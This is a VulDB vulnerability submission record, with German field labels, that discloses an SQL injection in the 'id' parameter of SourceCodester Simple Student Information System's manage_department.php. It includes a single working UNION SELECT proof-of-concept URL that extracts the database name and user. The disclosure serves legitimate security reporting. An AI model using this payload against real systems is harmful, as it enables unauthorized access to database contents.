| Titel | SourceCodester Simple Student Information System manage_department.php SQL Injection |
|---|
| Beschreibung | A vulnerability was found in Simple Student Information System admin/departments/manage_department.php released by SourceCodester,
The manipulation of the argument id leads to SQL Injection.
It is possible to initiate the attack remotely.
http://192.168.1.8/sis/admin/departments/manage_department.php?id=-5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20- |
|---|
| Quelle | ⚠️ https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Simple%20Student%20Information%20System/ |
|---|
| Benutzer | bewhale (UID 30640) |
|---|
| Einreichung | 07.08.2022 21:34 (vor 4 Jahren) |
|---|
| Moderieren | 07.08.2022 21:49 (15 minutes later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 205829 [SourceCodester Simple Student Information System manage_department.php ID SQL Injection] |
|---|
| Punkte | 20 |
|---|